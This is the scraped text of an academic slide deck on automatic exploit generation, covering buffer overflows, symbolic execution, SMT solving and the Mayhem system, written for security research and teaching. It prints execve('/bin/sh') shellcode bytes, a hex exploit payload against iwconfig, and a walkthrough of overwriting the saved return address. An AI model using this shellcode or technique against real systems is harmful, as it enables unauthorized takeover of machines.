700 likes | 830 Views
Checking the World’s Software for Exploitable Bugs. David Brumley Carnegie Mellon University dbrumley@cmu.edu http:// security.ece.cmu.edu /. An e pic battle. Black. White. vs. format c:. E xploit b ugs. Bug. Black. White. format c:. OK. Exploit. $ iwconfig accesspoint
E N D
Checking the World’s Software for Exploitable Bugs David Brumley Carnegie Mellon University dbrumley@cmu.edu http://security.ece.cmu.edu/
An epic battle Black White vs. format c:
Exploitbugs Bug Black White format c:
OK Exploit $ iwconfigaccesspoint $ iwconfig # 01ad 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 fce8 bfff 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 3101 50c0 2f68 732f 6868 622f 6e69 e389 5350 e189 d231 0bb0 80cd Superuser
Bug Fixed! Black White format c:
inp=`perl –e '{print "A"x8000}'` • for program in /usr/bin/*; do • for opt in {a..z} {A..Z}; do • timeout –s 9 1s $program -$opt $inp • done • done 1009 Linux programs. 13 minutes. 52 newbugs in 29 programs.
Which bugs are exploitable? Evil David
DEF CON 2012 scoreboard CMU Time (3 days total)
I skate to where the puck is going to be, not where it has been. --- Wayne Gretzky Hockey Hall of Fame
White Our Vision:AutomaticallyCheck the World’s Software for Exploitable Bugs
We owned the machine in seconds Evil David
Verification, but with a twist CorrectSafe paths Verification Program Incorrect Exploit Correctness PropertyUn-exploitability Property 33,248 programs 152 new exploitablebugs
Outline • Basic exploitation • Symbolic execution for exploit generation • Automatic exploit generation on real code • Experiments • Related projects and the future
Control flow hijack attacker gains control of execution • buffer overflow • format string attack • heap metadata overwrite • use-after-free • ... Same principle,different mechanism
Basic execution semantics of compiled code Process Memory Instruction Pointer points to next instruction to execute Fetch, decode, execute Code Processor EIP Data ... ... Stack Heap Control Flow Hijack: EIP = Attacker Code read and write
Buffer overflows and the runtimestack • int vulnerable(char *input) • { • char buf[32]; • int x; • if(...){ x = 1; • } else { • x = 0; • } • strcpy(buf,input); • return x; • } local variables Control flow hijack when input length > buffer length execution semantics, including call/return
lower addresses locals allocated on stack vulnerable’sinitialstackframe int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; }
input = “ABC\0” lower addresses Writes go up! writes ABC\0 int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; }
“return address” “return address” caller(){ i: vulnerable(input); i+1: ... saved eip lower addresses ABC\0 int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; } Processor EIP
A buffer overflow occurs when data is written outside of the space allocated for the buffer. • C does not check that writes are in-bound writes Classic Exploit:overwrite saved EIP Traditionally we show exploitability by running shellcode * More advanced methods, like Return-Oriented Programming, can also be automatically generated in our research
Shellcode is a string execve(“/bin/sh”, 0, 0); Compile \x31\xc9\xf7\xe1\x51\x68\x2f\x2f \x73\x68\x68\x2f\x62\x69\x6e\x89 \xe3\xb0\x0b\xcd\x80 Executable String Author: kernel_panik, http://www.shell-storm.org/shellcode/files/shellcode-752.php
input = shellcode . address of buf &buf \x31\xc9\xf7\xe1\x51\x68\x02\x02\x73\x68\x68\x2f... int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; } &buf Processor EIP
input = shellcode . address of buf Owned! %eip = <shellcode> execve(“/bin/sh”, NULL) &buf \x31\xc9\xf7\xe1\x51\x68\x02\x02\x73\x68\x68\x2f... int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; } &buf Processor EIP
Verification, but with a twist CorrectSafe path Verification Program Incorrect Exploitable Correctness PropertyUn-exploitability Property We use symbolic execution to test paths[Boyer75, Howden75,King76]
Basic symbolic execution x = input() x can be anything x > 42 if x > 42 t f (x > 42) ∧ (x*x != MAXINT) if x*x = MAXINT t f (x > 42) ∧ (x*x != MAXINT) ∧!(x < 42) jmp stack[x] if x < 42 t f
x = input() x can be anything x > 42 if x > 42 Path formula(true for inputs that take path) t f (x > 42) ∧ (x*x != MAXINT) if x*x = MAXINT t f (x > 42) ∧ (x*x != MAXINT) ∧!(x < 42) jmp stack[x] if x < 42 t f
Basic symbolic execution Satisfiable(x = 43) x = input() path test case! SatisfiabilityModulo Theory (SMT)Solver if x > 42 t f if x*x = MAXINT t f (x >42) ∧ (x*x != MAXINT) ∧!(x < 42) jmp stack[x] if x < 42 t f
Basic symbolic execution UNSAT (infeasible) x = input() SMT Solver if x > 42 t f if x*x = MAXINT t f (x >42) ∧ (x*x != MAXINT) ∧(x <= 42) jmp stack[x] if x < 42 t f
Checking non-exploitability x = input() Un-exploitability property: EIP != user input if x > 42 t f (x > 42) ∧ (x*x == MAXINT) ∧ Un-exploitable if x*x = MAXINT t f jmp stack[x] if x < 42 t f
Checking non-exploitability SAT (safe) UNSAT(exploit) SMT <path formula> ∧ eip!= user input For each path
Real world exploit generationa brief history Ours Others And >150 papers on symbolic execution
Exploiting Real Code:The Mayhem Architecture Principles: Require only the binarye.g., BAP, our binary analysis platform Use intelligent analysis to reduce state space e.g., preconditioned symbolic execution Make queries to SMT as easy as possiblee.g., symbolic memories
Potentially infinite state space strcpy(buf, input); if (input[0] != 0) if (input[1] != 0) if (input[n] != 0) t t t f f f while(input[i] != 0){ buf[i] = input[i]; i++; } buf[i] = 0; …
check every branch blindly if (input[0] != 0) if (input[1] != 0) if (input[n] != 0) 20 min exploration t t t f f f 30 min exploration … x min exploration Exploitable bug found KLEE [Cadar’08] does this
Preconditioned symbolic execution All Inputs Trigger bug Preconditions focus search, e.g.:input > len Control Hijack input vs bugs doesn’t typecheck other examples in [Avgerinos11]
Static and online analysis determines likely exploit conditions • 40 bytes • All non-NULL char buf[32]; int x; ... strcpy(buf, input);
Example: length precondition Precondition Check: length(input) > 40 ∧input[0] == 0 Unsatisfiable If (input[0] != 0) If (input[1] != 0) If (input[n] != 0) Unsatisfiable Not explored. Saved 20 min t t t f f f Precondition Check: length(input) > 40 ∧input[1] == 0 Not explored. Saved 30min … Not explored. Saved x min Exploitable bug found
Don’t treat as a black box! SAT. (x = 43) SMT Solver “program” the SMT (x >42) ∧ (x*x != 0xffffffff) ∧!(x < 42)
Symbolic memory indices x can be anything x := user_input(); <executed path> y := mem[x]; assert(y = 42); vulnerable(); Which memory cell contains42? 232 cells to check 0 Memory 232-1
Symbolic addresses occur often Other causes • Parsing: sscanf, vfprintf, etc. • Character test: isspace, isalpha, etc. • Conversion: toupper, tolower, mbtowc, etc. • … c = get_char(); ... to_lower(c); to_lower(char c){ c >= -128 && c < 256 ? tbl[c] : c; } tbl+’A’ Address is symbolic
Concretization: test case generation e.g., SAGE, DART, CUTE, KLEE x := user_input(); <executed path> y := mem[30]; assert(y = 42); vulnerable(); Misses over 40% of exploits 1 cell to check 0 30 Memory 232-1
Observation f t x can be anything Path formula constrains rangeof symbolic memoryaccesses f t x > 0 x < 5 0 < x < 5 y = mem[x] assert(y==42) Use symbolic execution state to:Step 1: Bound memory addresses referencedStep 2: Reduce to linear formulas